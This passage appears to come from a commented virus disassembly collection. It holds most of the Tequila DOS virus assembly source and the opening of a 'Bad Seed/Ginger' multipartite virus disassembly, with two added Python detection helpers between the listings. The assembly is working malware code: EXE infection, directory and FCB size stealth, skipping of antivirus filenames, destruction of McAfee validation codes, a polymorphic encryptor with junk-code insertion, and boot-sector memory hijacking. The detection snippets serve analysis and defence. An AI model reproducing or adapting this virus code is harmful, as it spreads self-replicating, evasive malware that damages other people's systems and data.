
                PUSH AX

                MOV AH, 2Fh             ; Get current DTA.
                CALL Do_Old_Int21h


                POP AX

                PUSHF                   ; Execute the call.
                CALL DWORD PTR CS:Old_Int21h

                PUSHF
                PUSH AX

                CMP AL, -1              ; Error?
                JE Exit_FCB_St          ; Then get out.

                CMP ES:[BX.FCB_Drive], -1 ; Is it an extended FCB ?
                JNE Get_FCB_Time

                ADD BX, 7               ; Then skip extended stuff.

Get_FCB_Time:   MOV AL, BYTE PTR ES:[BX.FCB_Time]

                AND AL, 00011111b       ; Mask-out seconds value.

                CMP AL, (62/2)          ; File is infected?
                JNE Exit_FCB_St

; Restore the original filesize.

                SUB ES:[BX.FCB_Size], Virus_Size
                SBB ES:[BX.FCB_Size+2], 0

Exit_FCB_St:    POP AX
                POPF

                POP ES
                POP BX

                RETN

Dir_Stealth:    PUSH BX
                PUSH ES

                PUSH AX

                MOV AH, 2Fh             ; Get current DTA.
                CALL Do_Old_Int21h

                POP AX

                PUSHF                   ; Execute the call.
                CALL DWORD PTR CS:Old_Int21h

                PUSHF
                PUSH AX

                JC Exit_Dir_St          ; Get out if error.

                MOV AL, BYTE PTR ES:[BX.Dir_Time]

                AND AL, 00011111b       ; Mask-out seconds value.

                CMP AL, (62/2)          ; File is infected?
                JNE Exit_Dir_St


; Restore original filesize.

                SUB ES:[BX.Dir_Size], Virus_Size
                SBB ES:[BX.Dir_Size+2], 0

Exit_Dir_St:    POP AX
                POPF

                POP ES
                POP BX

                RETN
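Both stealth routines above key on the same marker: the 2-second field of the file's DOS time holds (62/2) = 31, a value DOS itself never writes, and only records carrying it get Virus_Size subtracted from their size. The following Python is an added example for this page, not code from the article or from Tequila. It parses the findfirst/findnext result record that lands in the DTA (INT 21h AH=4Eh/4Fh layout: attribute at 15h, time at 16h, date at 18h, size at 1Ah, ASCIZ name at 1Eh) and flags the impossible seconds value. The two records it parses are constructed for the demonstration.

```python
"""Parse DOS findfirst/findnext (DTA) records and flag the out-of-range seconds
field the stealth code above uses as its infection marker.  Added example for
this page (not the article's or Tequila's code); sample records are constructed."""
import struct

# Offsets inside the 43-byte find record the INT 21h/4Eh,4Fh calls fill in.
ATTR_OFF, TIME_OFF, DATE_OFF, SIZE_OFF, NAME_OFF = 0x15, 0x16, 0x18, 0x1A, 0x1E
RECORD_LEN = 43


def decode_dos_time(word):
    """Packed DOS time: 5 bits hour, 6 bits minute, 5 bits of 2-second units."""
    return word >> 11, (word >> 5) & 0x3F, (word & 0x1F) * 2


def decode_dos_date(word):
    """Packed DOS date: 7 bits year since 1980, 4 bits month, 5 bits day."""
    return 1980 + (word >> 9), (word >> 5) & 0x0F, word & 0x1F


def parse_find_record(dta):
    if len(dta) < RECORD_LEN:
        raise ValueError("find record is shorter than 43 bytes")
    time_word, date_word, size = struct.unpack_from("<HHI", dta, TIME_OFF)
    name = dta[NAME_OFF:NAME_OFF + 13].split(b"\x00", 1)[0].decode("ascii")
    return {"name": name, "attr": dta[ATTR_OFF], "size": size,
            "time": decode_dos_time(time_word), "date": decode_dos_date(date_word),
            "seconds_field": time_word & 0x1F}


def has_invalid_seconds(rec):
    """True when the 2-second field exceeds 29 (i.e. 60 or 62 seconds), which
    DOS never produces; Tequila's (62/2) marker is the case seen above.  Note the
    Dildo listing earlier on the page uses 6 seconds, a valid value, so this
    check does not apply to it."""
    return rec["seconds_field"] > 29


def build_find_record(name, size, hour, minute, seconds_field, year, month, day):
    """Constructed sample record (not captured from a real DTA)."""
    rec = bytearray(RECORD_LEN)
    rec[ATTR_OFF] = 0x20                                   # archive attribute
    time_word = (hour << 11) | (minute << 5) | seconds_field
    date_word = ((year - 1980) << 9) | (month << 5) | day
    struct.pack_into("<HHI", rec, TIME_OFF, time_word, date_word, size)
    rec[NAME_OFF:NAME_OFF + len(name)] = name.encode("ascii")
    return bytes(rec)


MARKED_RECORD = build_find_record("PROG.EXE", 40000, 12, 30, 31, 1991, 4, 1)
CLEAN_RECORD = build_find_record("OTHER.EXE", 20000, 9, 15, 10, 1991, 4, 1)

if __name__ == "__main__":
    for raw in (MARKED_RECORD, CLEAN_RECORD):
        rec = parse_find_record(raw)
        print(rec["name"], rec["time"], "marker" if has_invalid_seconds(rec) else "ok")
```

While the virus is resident, the size the record reports is already reduced, so a responder compares sizes taken from a clean boot with those seen under the suspect system; the seconds check works either way because the stealth code leaves the time word untouched.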

Write_File:     MOV AH, 40h             ; Write to file.
                JMP Do_Read_Write

Read_File:      MOV AH, 3Fh             ; Read from file.

Do_Read_Write:  CALL Load_BX_Int21h
                JC Exit_Re_Wr           ; If error then exit with CF.

                SUB AX, CX              ; Sets CF if not all bytes
                                        ; were read.

Exit_Re_Wr:     RETN

Seek_EOF:       XOR CX, CX              ; Seeks to end of file.
                XOR DX, DX

Seek_EOF_Rel:   MOV AX, 4202h           ; Seeks EOF relative.
                JMP Load_BX_Int21h

Seek_BOF:       XOR CX, CX              ; Seeks to begin of file.
                XOR DX, DX
                MOV AX, 4200h

Load_BX_Int21h: MOV BX, CS:File_Handle  ; Load the filehandle.

Do_Old_Int21h:  CLI                     ; Do the DOS call.
                PUSHF
                CALL DWORD PTR CS:Old_Int21h

                RETN

Infect_File:    PUSH AX
                PUSH BX
                PUSH CX
                PUSH DX
                PUSH SI
                PUSH DI
                PUSH ES
                PUSH DS

                CALL Check_File_Name    ; Filename can't contain 'SC'
                JNC Init_Infect         ; or a 'V'.

                JMP Exit_Infect


Init_Infect:    PUSH DX
                PUSH DS

                PUSH CS
                POP DS

                MOV AX, 3524h           ; Get INT 24h.
                CALL Do_Old_Int21h

                MOV Old_Int24h, BX      ; Save it.
                MOV Old_Int24h+2, ES

                MOV AX, 2524h           ; Install own INT 24h.
                MOV DX, OFFSET New_Int24h
                CALL Do_Old_Int21h

                POP DS                  ; File path.
                POP DX

                MOV AX, 4300h           ; Get file's attributes.
                CALL Do_Old_Int21h

                MOV CS:Old_Attr, CX     ; Save attributes.

                JNC Blank_Attr

                DB 0E9h, 7Eh, 0

; * JMP Restore_Int24h *

Blank_Attr:     MOV AX, 4301h           ; Blank file attributes.
                XOR CX, CX
                CALL Do_Old_Int21h
                JC Restore_Int24h

                MOV AX, 3D02h           ; Open the file read/write.
                CALL Do_Old_Int21h
                JC Restore_Attr

                PUSH DX
                PUSH DS

                PUSH CS
                POP DS

                MOV File_Handle, AX     ; Save the filehandle.

                MOV AX, 5700h           ; Get file's date & time.
                CALL Load_BX_Int21h
                JC Restore_Date

                MOV Old_File_Date, DX   ; Save them.
                MOV Old_File_Time, CX

                CALL Seek_BOF           ; Seek to the start of the
                                        ; file. *** file pointer is
                                        ; already at BOF.

                MOV DX, OFFSET Header   ; Read the file's header.
                MOV CX, 28              ; *** Reading in more than
                CALL Read_File          ; needed.
                JC Restore_Date


                PUSH DS
                POP ES

                MOV DI, OFFSET Check_Activate
                MOV CX, 32

                CMP Header.EXE_ID, 'ZM' ; It's an .EXE-file?
                JNE Restore_Date        ; If not, abort infect.

                MOV AX, Header.Checksum ; See if the checksum matches
                CLD                     ; a semi-random word in the
                REPNE SCASW             ; viruscode.
                JNE Check_Validate

                OR Old_File_Time, (62/2) ; *** Infected files already
                                        ; have 62 seconds.

                JMP Restore_Date

Check_Validate: CALL Remove_Validate    ; Remove McAfee validation
                JC Restore_Date         ; shit.

                CALL Add_Virus          ; Add the virus to the file.

Restore_Date:   MOV AX, 5701h           ; Restore file's date & time.
                MOV DX, Old_File_Date
                MOV CX, Old_File_Time
                CALL Load_BX_Int21h

                MOV AH, 3Eh             ; Close the file.
                CALL Load_BX_Int21h

                POP DS                  ; File path.
                POP DX

Restore_Attr:   MOV AX, 4301h           ; Restore file's original
                MOV CX, CS:Old_Attr     ; attributes.
                CALL Do_Old_Int21h

Restore_Int24h: MOV AX, 2524h           ; Restore original INT 24h.
                LDS DX, DWORD PTR CS:Old_Int24h
                CALL Do_Old_Int21h

Exit_Infect:    POP DS
                POP ES
                POP DI
                POP SI
                POP DX
                POP CX
                POP BX
                POP AX

                RETN

; Returns CF when the filename holds 'SC' or a 'V', this includes most
; anti-virus programs, SCAN, TBSCAN, VIRSCAN, CPAV, NAV, IBMAV, etc.
Check_File_Name:
                PUSH DS
                POP ES

                MOV DI, DX              ; Find the end of the string.
                MOV CX, -1


                XOR AL, AL
                CLD
                REPNE SCASB

                NOT CX                  ; CX = length of entire path.

                MOV DI, DX

                MOV AX, 'CS'            ; 'SC'.

                MOV SI, CX

Find_SCan:      SCASW                   ; Found 'SC' ?
                JE Bad_File_Name        ; Then bail.

                DEC DI                  ; We're doing bytes.

                LOOP Find_SCan

                MOV CX, SI              ; Search for a 'V'.
                MOV DI, DX
                MOV AL, 'V'
                REPNE SCASB
                JE Bad_File_Name

; *** It would have been better if only the filename
; was searched instead of the entire path.

Good_File_Name: CLC                     ; Filename is OK.

                RETN

Bad_File_Name:  STC                     ; Filename ain't OK!

                RETN

; Removes a possible McAfee validation code from the file.
Remove_Validate:
                MOV CX, -1              ; Seek to the last 10 bytes.
                MOV DX, -10
                CALL Seek_EOF_Rel

                MOV DX, OFFSET Validate_Header ; Read 8 from there.
                MOV CX, 8
                CALL Read_File
                JC Exit_Remove_Va

                CMP Validate_Header, 0FDF0h ; Check for the signature.
                JNE Not_Protected

                CMP Validate_Header+2, 0AAC5h
                JNE Not_Protected

                MOV CX, -1              ; Seek to the last 9 bytes.
                MOV DX, -9
                CALL Seek_EOF_Rel

; Trash signature.

                MOV DX, OFFSET Validate_Header + 6
                MOV CX, 4
                CALL Write_File


Exit_Remove_Va: RETN

Not_Protected:  CLC

                RETN

Add_Virus:      CALL Seek_EOF

                MOV SI, AX              ; DI:SI = old filesize.
                MOV DI, DX

                MOV BX, OFFSET Header

                MOV AX, [BX.File_512_Pages] ; Calculate 512-byte pages
                MUL Word_512            ; of the file.

                SUB AX, SI              ; Physical size exceeds image
                SBB DX, DI              ; size? Then it's usually an
                JNC Calc_Hdr_Size       ; overlay, so bug out.

                JMP Exit_Add_Virus

Calc_Hdr_Size:  MOV AX, [BX.Header_Size] ; Calculate headersize.
                MUL Word_16

                SUB SI, AX              ; DI:SI = imagesize.
                SBB DI, DX

                MOV AX, [BX.Program_SS] ; Save file's original SS.
                MOV Host_SS, AX
                ADD Host_SS, (256/16)   ; Add PSP size.

                MUL Word_16             ; DX:AX = SS in bytes.

                ADD AX, [BX.Program_SP] ; Plus SP value.
                                        ; *** Missing an ADC DX, 0.

                SUB AX, SI              ; Stack points inside the
                SBB DX, DI              ; program image?
                JC Save_CS

                SUB AX, 128             ; Original program must have
                SBB DX, 0               ; at least 128 bytes of stack.
                JC Exit_Add_Virus       ; Else get out.

; Adjust the stack so the viruscode
; doesn't get overwritten.

                ADD [BX.Program_SS], (Virus_Size + 15) / 16

Save_CS:        MOV AX, [BX.Program_CS] ; Old CS.
                ADD AX, (256/16)        ; Add size of PSP.

                MOV Host_CS, AX         ; Save CS.

                MOV AX, [BX.Program_IP] ; Save IP.
                MOV Host_IP, AX

                CALL Seek_EOF


                ADD AX, Virus_Size      ; Calculate size after
                ADC DX, 0               ; infection.

                DIV Word_512            ; Calculate imagesize.

                INC AX                  ; Round upwards.

; Set new imagesize.

                MOV Header.File_512_Pages, AX
                MOV Header.Image_Mod_512, DX

                MOV DX, DI              ; DI:SI = old imagesize.
                MOV AX, SI
                DIV Word_16             ; Calculate new CS:IP.

                MOV Header.Program_CS, AX ; Set new CS.

                MOV BX, DX              ; BX = new IP.

                ADD DX, OFFSET Decryptor ; Set new IP.
                MOV Header.Program_IP, DX

                CALL Poly_Engine        ; Add a polymorphic virus
                JC Exit_Add_Virus       ; copy to the host.

                OR Old_File_Time, (62/2) ; Mark the file as infected
                                        ; by setting the second value
                                        ; to an invalid setting.

                MOV BX, Int_Count       ; Random counter.
                AND BX, 00011111b       ; 0 - 31.
                SHL BX, 1               ; MUL 2 (for word index).

; Put a semi-random word from the viruscode in the
; header's checksum field to mark the infection.

                MOV AX, [(Check_Activate - START) + BX]
                MOV Header.Checksum, AX

                CALL Seek_BOF

                MOV CX, 28              ; Write the updated header
                MOV DX, OFFSET Header   ; to the target.
                CALL Write_File

Exit_Add_Virus: RETN

; The decryptors being generated are quite simple; they are effective
; enough against pure signature scanners, though they can be found with a simple
; algorithmic approach. A peculiarity is that the decryptors use themselves
; as a key, which drastically complicates debugging.

Poly_Engine:    PUSH BP

                XOR AH, AH              ; Get BIOS tick count.
                INT 1Ah

                MOV AX, DX
                MOV BP, DX              ; BP is used as a pointer to
                                        ; random data.


                PUSH DS
                POP ES

                MOV DI, OFFSET Decryptor ; Fill the decryptor area
                MOV SI, DI              ; with a random word.
                MOV CX, (64/2)
                CLD
                REP STOSW

                XOR DX, DX              ; Zero ES.
                MOV ES, DX

                CALL Make_Load_DS       ; Construct the decryptor.
                CALL Make_Load_Ptr
                CALL Make_Decr_Loop

                MOV BYTE PTR [SI], 0E9h ; JMP 16-bit displacement.

                MOV DI, OFFSET Init_Virus ; Calculate displacement
                SUB DI, SI              ; to Init_Virus.
                SUB DI, 3

                INC SI

                MOV [SI], DI            ; Set displacement.

                MOV AX, OFFSET Append_Body_Encrypted_Copy
                CALL AX

                POP BP

                RETN

Make_Load_DS:   DEC BP                  ; Adjust random pointer.
                                        ; *** Not needed as this is
                                        ; the first reference to it.

                TEST BYTE PTR ES:[BP], 00000010b ; Test a random bit.
                JNZ Make_Load_DS_2

Make_Load_DS_1: MOV BYTE PTR [SI], 0Eh  ; PUSH CS
                INC SI

                CALL Add_Junk           ; Add a garbage instruction.

                MOV BYTE PTR [SI], 1Fh  ; POP DS
                INC SI

                CALL Add_Junk

                RETN

Make_Load_DS_2: MOV [SI], 0CB8Ch        ; MOV BX, CS
                INC SI
                INC SI

                CALL Add_Junk

                MOV [SI], 0DB8Eh        ; MOV DS, BX
                INC SI
                INC SI


                CALL Add_Junk

                RETN

Make_Load_Ptr:  AND CH, 11111110b       ; BX is start code.
                                        ; *** CX is already zero.
                DEC BP

                TEST BYTE PTR ES:[BP], 00000010b
                JZ Make_MOV_BX

                OR CH, 00000001b        ; SI is start code.

Make_MOV_SI:    MOV BYTE PTR [SI], 0BEh ; MOV SI, xxxx
                INC SI

                MOV [SI], BX            ; Start virus in CS or
                INC SI                  ; start decryptor in CS.

                INC SI

                CALL Add_Junk

                ADD BX, OFFSET Decryptor

                TEST CH, 00000001b      ; BX is start code?
                JZ Make_Counter

Make_MOV_BX:    MOV BYTE PTR [SI], 0BBh ; MOV BX, xxxx
                INC SI

                MOV [SI], BX            ; Start virus in CS or
                INC SI                  ; start decryptor in CS.

                INC SI

                CALL Add_Junk

                ADD BX, OFFSET Decryptor

                TEST CH, 00000001b      ; BX is start code?
                JZ Make_MOV_SI          ; Then use SI as start
                                        ; decryptor.

Make_Counter:   SUB BX, OFFSET Decryptor ; Restore BX to virus offset.

                CALL Add_Junk

; CX is always the counter register.

                MOV BYTE PTR [SI], 0B9h ; MOV CX, xxxx
                INC SI

                MOV AX, OFFSET Decryptor

                MOV [SI], AX            ; Size of encrypted code.
                INC SI
                INC SI

                CALL Add_Junk
                CALL Add_Junk


                RETN

Make_Decr_Loop: MOV AH, 14h                     ; DL, [SI]
                MOV DH, 17h                     ; DL, [BX]

                TEST CH, 00000001b              ; BX is start of code?
                JZ Make_Load_Byte               ; Yeah.

                XCHG AH, DH                     ; Else SI is.

Make_Load_Byte: MOV DI, SI                      ; Save start decrypt in DI.

                MOV AL, 8Ah                     ; MOV reg8

                MOV [SI], AX                    ; MOV DL, [SI]/[BX]
                INC SI
                INC SI

                CALL Add_Junk

                XOR DL, DL                      ; ADD BYTE PTR

                ; Initialize the encryptor.

                MOV BYTE PTR DS:[Append_Body_Encrypted_Copy+(Encryptor-Append_Body_Encrypted)], 28h ; SUB BYTE PTR

                DEC BP

                TEST BYTE PTR ES:[BP], 00000010b
                JZ Store_Decrypt

                MOV DL, 30h                     ; XOR BYTE PTR

                ; Initialize the encryptor.

                MOV BYTE PTR DS:[Append_Body_Encrypted_Copy+(Encryptor-Append_Body_Encrypted)], DL

Store_Decrypt:  MOV [SI], DX                    ; Store decrypt instruction.
                INC SI
                INC SI

                MOV [SI], 4346h                 ; INC SI / INC BX
                INC SI
                INC SI

                CALL Add_Junk

                MOV AX, 0FE81h                  ; CMP SI, xxxx
                MOV CL, 0BEh                    ; MOV SI, xxxx

                TEST CH, 00000001b              ; BX is start of code?
                JZ Make_CMP_End                 ; Yip-yip.

                MOV AH, 0FBh                    ; CMP BX, xxxx
                MOV CL, 0BBh                    ; MOV BX, xxxx

Make_CMP_End:   MOV [SI], AX                    ; Make CMP end_decryptor.
                INC SI
                INC SI


                PUSH BX

                ADD BX, 64                      ; Offset decryptor + fixed
                                                ; size of decryptor.

                MOV [SI], BX                    ; (end of decryptor).
                INC SI
                INC SI

                POP BX                          ; Start of code.

                MOV BYTE PTR [SI], 72h          ; JB xx
                INC SI

                MOV DX, SI                      ; DX = displacement patch
                                                ; offset.

                INC SI

                CALL Add_Junk

                MOV [SI], CL                    ; MOV BX/SI, xxxx
                INC SI

                MOV [SI], BX                    ; Start decryptor.
                INC SI
                INC SI

                MOV AX, SI                      ; Calculate displacement
                SUB AX, DX                      ; between DX and SI.

                DEC AX

                MOV BX, DX                      ; JB displacement offset.
                MOV [BX], AL                    ; Patch it.

                CALL Add_Junk
                CALL Add_Junk

                MOV BYTE PTR [SI], 0E2h         ; LOOP xx
                INC SI

                SUB DI, SI                      ; Displacement between here
                DEC DI                          ; and start decrypt loop.

                MOV AX, DI

                MOV [SI], AL                    ; Store displacement.
                INC SI

                CALL Add_Junk

                RETN

Add_Junk:       DEC BP

                TEST BYTE PTR ES:[BP], 00001111b
                JZ Exit_Add_Junk

                DEC BP
                MOV AL, ES:[BP]


                TEST AL, 00000010b
                JZ Junk_CMP

                TEST AL, 00000100b
                JZ Junk_TEST

                TEST AL, 00001000b
                JZ Junk_NOP

                MOV [SI], 0C789h                ; MOV DI, AX
                INC SI
                INC SI

                JMP Exit_Add_Junk

Junk_NOP:       MOV BYTE PTR [SI], 90h          ; NOP
                INC SI

                JMP Exit_Add_Junk

Junk_TEST:      MOV AL, 85h                     ; TEST r16

Make_Operand:   DEC BP
                MOV AH, ES:[BP]

                TEST AH, 00000010b
                JZ Set_reg_reg

                DEC AL                          ; r16 -> r8.

Set_reg_reg:    OR AH, 11000000b                ; reg/reg operation.

                MOV [SI], AX                    ; Store junk instruction.
                INC SI
                INC SI

                JMP Exit_Add_Junk

Junk_CMP:       DEC BP

                TEST BYTE PTR ES:[BP], 00000010b
                JZ Junk_CLD

                MOV AL, 39h                     ; CMP r16, r16
                JMP Make_Operand

Junk_CLD:       MOV BYTE PTR [SI], 0FCh         ; CLD
                INC SI

Exit_Add_Junk:  RETN

Append_Body_Encrypted:
                CALL Crypt_Virus

                MOV AH, 40h
                MOV BX, File_Handle
                MOV DX, 0
                MOV CX, Virus_Size

                PUSHF
                CALL DWORD PTR Old_Int21h


                JC Crypt_Loop

                SUB AX, CX

Crypt_Loop:     PUSHF

                CMP BYTE PTR DS:Append_Body_Encrypted_Copy+(Encryptor-Append_Body_Encrypted), 28h ; SUB

                JNE Do_Crypt_Virus

                MOV BYTE PTR DS:Append_Body_Encrypted_Copy+(Encryptor-Append_Body_Encrypted), 0

Do_Crypt_Virus: CALL Crypt_Virus

                POPF

                RETN

Crypt_Virus:    MOV BX, 0
                MOV SI, OFFSET Decryptor
                MOV CX, OFFSET Decryptor

Crypt_Byte:     MOV DL, [SI]                    ; Get key from the decryptor.

                XOR [BX], DL                    ; Encrypt/decrypt byte.
Encryptor       = BYTE PTR $-2

                INC SI
                INC BX

                CMP SI, OFFSET Old_Int13h
                JB Loop_Crypt_B

                MOV SI, OFFSET Decryptor

Loop_Crypt_B:   LOOP Crypt_Byte

                RETN

Decryptor:      PUSH CS

                TEST CL, BL

                POP DS                          ; Load DS with CS.

                MOV BX, 0

                TEST SP, AX

                MOV SI, OFFSET Decryptor        ; Decryptor pointer.

                CLD

                TEST CH, BL

                MOV CX, OFFSET Decryptor        ; Count to decrypt.

                TEST AX, CX


Decrypt_Byte:   MOV DL, [SI]                    ; Get the key from the
                                                ; decryptor.

                DB 039h, 0D8h                   ; * CMP AX, BX *

                XOR [BX], DL                    ; Decrypt byte.

                INC SI                          ; Update code & decryptor
                INC BX                          ; pointers.

                NOP

                CMP SI, OFFSET Old_Int13h       ; Completely ran over the
                JB Decrypt_Loop                 ; decryptor?

                NOP

                MOV SI, OFFSET Decryptor        ; Then reload the pointer.

Decrypt_Loop:   NOP

                LOOP Decrypt_Byte               ; Decrypt all bytes.

                CLD

                JMP Init_Virus                  ; Jump to the real start.

                ORG Decryptor+64                ; Pad decryptor size.

Old_Int13h      DW 0, 0

End_Body:

Buffer:

File_Handle     DW 0
Old_SP          DW 0
Old_SS          DW 0
Old_Attr        DW 0
Old_File_Date   DW 0
Old_File_Time   DW 0
Old_Int1Ch      DW 0, 0
Old_Int21h      DW 0, 0
Old_Int24h      DW 0, 0
Int_Count       DW 0

New_Int13h_Copy:
                DB (New_Int1Ch-New_Int13h) DUP (0)

Append_Body_Encrypted_Copy:
                DB (Decryptor-Append_Body_Encrypted) DUP (0)

Header          DW 14 DUP (0)

Validate_Header DW 4 DUP (0)

                ORG Buffer+512
End_Heap:


Carrier:        MOV AX, 4C00h
                INT 21h

EXE_Header      STRUC
EXE_ID          DW 0
Image_Mod_512   DW 0
File_512_Pages  DW 0
Reloc_Items     DW 0
Header_Size     DW 0
Min_Size_Mem    DW 0
Max_Size_Mem    DW 0
Program_SS      DW 0
Program_SP      DW 0
Checksum        DW 0
Program_IP      DW 0
Program_CS      DW 0
Reloc_Table     DW 0
EXE_Header      ENDS

Find_FN_FCB     STRUC
FCB_Drive       DB 0
FCB_Name        DB 8 DUP (0)
FCB_Ext         DB 3 DUP (0)
FCB_Attr        DB 0
FCB_Reserved    DB 10 DUP (0)
FCB_Time        DW 0
FCB_Date        DW 0
FCB_Start_Clust DW 0
FCB_Size        DW 0, 0
Find_FN_FCB     ENDS

Find_FN_Dir     STRUC
Dir_Reserved    DB 21 DUP (0)
Dir_Attr        DB 0
Dir_Time        DW 0
Dir_Date        DW 0
Dir_Size        DW 0, 0
Dir_Name        DB 13 DUP (0)
Find_FN_Dir     ENDS

                END Init_Virus
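The "simple algorithmic approach" the header comment of Poly_Engine refers to, as an added example in Python (not part of the Tequila source): it skips the junk forms Add_Junk can emit and then checks the bytes against the fixed opcode skeleton that Make_Load_DS, Make_Load_Ptr and Make_Decr_Loop generate, treating immediates and displacements as wildcards. The sample buffer is constructed from the Decryptor template in the listing, with arbitrary offsets.

```python
# Added example, not part of the Tequila listing: a skeleton matcher for the
# decryptors Poly_Engine emits. Junk (MOV DI,AX / NOP / TEST r,r / CMP r,r /
# CLD) is skipped, then the fixed instruction shape is required, with
# immediates and displacements as wildcards. Sample bytes are constructed.

JUNK_ONE_BYTE = {0x90, 0xFC}                 # NOP, CLD
JUNK_REG_REG = {0x85, 0x84, 0x39, 0x38}      # TEST/CMP r16,r16 and r8,r8

def strip_junk(code: bytes, pos: int) -> int:
    """Advance pos past any run of Add_Junk output."""
    while pos < len(code):
        op = code[pos]
        nxt = code[pos + 1] if pos + 1 < len(code) else None
        if op in JUNK_ONE_BYTE:
            pos += 1
        elif op in JUNK_REG_REG and nxt is not None and nxt >= 0xC0:
            pos += 2                          # Set_reg_reg forces reg/reg ModRM
        elif op == 0x89 and nxt == 0xC7:
            pos += 2                          # MOV DI, AX
        else:
            break
    return pos

# One entry per real instruction, in emission order; each entry lists the
# byte forms the engine may pick, None standing for a byte filled at runtime.
MOV_SI_OR_BX = ((0xBE, None, None), (0xBB, None, None))
SKELETON = [
    ((0x0E,), (0x8C, 0xCB)),                  # PUSH CS         | MOV BX, CS
    ((0x1F,), (0x8E, 0xDB)),                  # POP DS          | MOV DS, BX
    MOV_SI_OR_BX,                             # MOV SI/BX, start of code
    MOV_SI_OR_BX,                             # MOV BX/SI, OFFSET Decryptor
    ((0xB9, None, None),),                    # MOV CX, bytes to decrypt
    ((0x8A, 0x14), (0x8A, 0x17)),             # MOV DL, [SI] | MOV DL, [BX]
    ((0x30, 0x17), (0x30, 0x14),              # XOR [BX|SI], DL
     (0x28, 0x17), (0x28, 0x14),              # SUB [BX|SI], DL
     (0x00, 0x17), (0x00, 0x14)),             # ADD [BX|SI], DL
    ((0x46, 0x43),),                          # INC SI / INC BX
    ((0x81, 0xFE, None, None),                # CMP SI, end of decryptor
     (0x81, 0xFB, None, None)),               # CMP BX, end of decryptor
    ((0x72, None),),                          # JB rel8
    MOV_SI_OR_BX,                             # reload key pointer
    ((0xE2, None),),                          # LOOP rel8
    ((0xE9, None, None),),                    # JMP rel16 to Init_Virus
]

def match_decryptor(code: bytes, start: int = 0):
    """Return (matched, end); end is the offset just past the final JMP."""
    pos = start
    for step in SKELETON:
        pos = strip_junk(code, pos)
        for form in step:
            end = pos + len(form)
            if end <= len(code) and all(
                want is None or want == got
                for want, got in zip(form, code[pos:end])
            ):
                pos = end
                break
        else:
            return False, pos
    return True, pos

def find_decryptor(code: bytes) -> int:
    """Offset of the first decryptor in a buffer, or -1 if none."""
    for start in range(len(code)):
        if code[start] in (0x0E, 0x8C) and match_decryptor(code, start)[0]:
            return start
    return -1

# Constructed sample: the Decryptor template from the listing (junk marked),
# with arbitrary immediates, behind a few bytes of unrelated host code.
SAMPLE = bytes([
    0xB8, 0x00, 0x4C, 0xCD, 0x21,             # MOV AX, 4C00h / INT 21h (host)
    0x0E,                                     # PUSH CS
    0x84, 0xD9,                               # TEST CL, BL      (junk)
    0x1F,                                     # POP DS
    0xBB, 0x00, 0x00,                         # MOV BX, 0
    0x85, 0xC4,                               # TEST SP, AX      (junk)
    0xBE, 0x34, 0x12,                         # MOV SI, OFFSET Decryptor
    0xFC,                                     # CLD              (junk)
    0x84, 0xDD,                               # TEST CH, BL      (junk)
    0xB9, 0x34, 0x12,                         # MOV CX, OFFSET Decryptor
    0x85, 0xC8,                               # TEST AX, CX      (junk)
    0x8A, 0x14,                               # MOV DL, [SI]
    0x39, 0xD8,                               # CMP AX, BX       (junk)
    0x30, 0x17,                               # XOR [BX], DL
    0x46, 0x43,                               # INC SI / INC BX
    0x90,                                     # NOP              (junk)
    0x81, 0xFE, 0x74, 0x12,                   # CMP SI, Decryptor+64
    0x72, 0x04,                               # JB Decrypt_Loop
    0x90,                                     # NOP              (junk)
    0xBE, 0x34, 0x12,                         # MOV SI, OFFSET Decryptor
    0x90,                                     # NOP              (junk)
    0xE2, 0xEA,                               # LOOP Decrypt_Byte
    0xFC,                                     # CLD              (junk)
    0xE9, 0x10, 0x00,                         # JMP Init_Virus
])
```

Because the junk set and the skeleton are both taken from the engine, any decryptor it can produce (either DS load, either pointer order, XOR/SUB/ADD) matches, while a plain byte signature would miss all but one variant.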


; Bad Seed (Ginger.2782) disasm.
; Multipartite full-stealth MBS/COM/EXE.
; Quite a good virus for its time (1992), yet the coding style could be
; made more compact, and it's buggy as well.
; Bugs marked with '***'.
; T-2000/IR, February 2000 - September 2000.

.MODEL TINY

.CODE

Virus_Size      EQU (End_Body-START)
Virus_Size_512  EQU ((End_Body-START)+511)/512
Virus_Size_1024 EQU 3
COM             EQU 1
EXE             EQU 0
Boot            EQU 0
File            EQU 1

START:          CALL File_Entry

Boot_Loader:                                    ; *** This code assumes DS = 0, which
                                                ; does not necessarily have to be the case.

                ; Restore original word that was temporarily
                ; replaced with the 55AAh bootmarker.

                MOV WORD PTR DS:[7C00h+510], 0
Original_Word   = WORD PTR $-2

                ; Steal 3k of DOS memory to hide the virus in.

                SUB WORD PTR DS:[413h], Virus_Size_1024

                INT 12h                         ; Get new DOS memory size.

                MOV CL, 6                       ; Calculate segment where to
                SHL AX, CL                      ; hide.

                MOV ES, AX                      ; ES = virus segment.

                ; Read rest of virusbody off disk.

                MOV AX, 0200h+(Virus_Size_512-1)
                MOV BX, 512+3
                MOV CX, 3
                INT 13h

                MOV AL, 0E8h                    ; CALL xxxx opcode.
                XOR DI, DI                      ; A call to the entrypoint
                CLD                             ; for file infections.
                STOSB

                MOV AX, (File_Entry-Boot_Loader)
                STOSW

                MOV CX, (512/2)                 ; Copy virus bootsector
                MOV SI, 7C00h                   ; too to virus segment.
                REP MOVSW

                ; Initialize some variables.


                MOV ES:Ofs_Old_Int13h, OFFSET Old_Int13h
                MOV ES:Ofs_Real_Int13h, OFFSET Real_Int13h
                MOV ES:Origin, Boot
                MOV ES:File_Handle, 0

                MOV SI, OFFSET Hook_Ints

                PUSH ES                         ; Relocated virus code.
                PUSH SI

                MOV AX, OFFSET Boot_Int21h
                MOV SI, OFFSET Boot_Loader
                MOV DI, OFFSET Old_Int08h

                NOP

                RETF                            ; Jump to relocated code.

EXE_Data:

EXE_SP          DW 0
EXE_SS          DW 0
EXE_IP          DW 0
EXE_CS          DW 0

                DB 'You can''t catch the Gingerbread Man!!'

File_Entry:     XCHG BP, AX                     ; Save AX (FCB-status) in BP.

                POP SI                          ; POP delta offset.

                PUSH ES                         ; Save ES & DS (PSP).
                PUSH DS

                PUSH CS
                POP DS

                MOV AX, 0EEE7h                  ; See if virus is already
                INT 21h                         ; TSR.

                CMP AX, 0D703h                  ; It is?
                JE JMP_Run_Host                 ; Then bail to host.

                MOV ES, ES:[2Ch]                ; Environment block.

                CLD
                XOR DI, DI

Find_ComSpec:   PUSH SI

                ; Scan for COMSPEC= to find the command interpreter.

                ADD SI, (ComSpec_String-Boot_Loader)
                MOV CX, 8
                REPE CMPSB

                PUSHF

                CALL Get_End_DI                 ; Go to the next setting.

                POPF
                JE Save_ComSpec                 ; Yeah got it..


                POP SI

                JNE Find_ComSpec                ; Repeat the search.

